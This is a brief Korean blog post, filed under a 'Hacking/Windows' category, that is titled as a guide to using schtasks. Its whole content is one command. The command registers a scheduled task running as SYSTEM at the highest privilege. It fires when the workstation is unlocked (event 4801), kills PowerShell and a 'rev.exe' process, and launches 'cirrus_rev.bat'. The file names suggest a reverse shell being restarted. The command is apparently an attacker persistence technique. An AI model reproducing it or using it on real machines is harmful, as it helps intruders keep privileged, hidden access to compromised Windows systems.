Hacking/Windows

[Windows] schtask 사용법

Cirrus.Kim 2016. 11. 23. 21:23

schtasks /RU "NT Authority\SYSTEM" /Create /SC ONEVENT /MO "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4801]]" /EC Security /TN "cirruslogon" /TR "cmd /c (taskkill /F /IM powershell.exe rev.exe) & c:\cirrus_rev.bat" /F /RL highest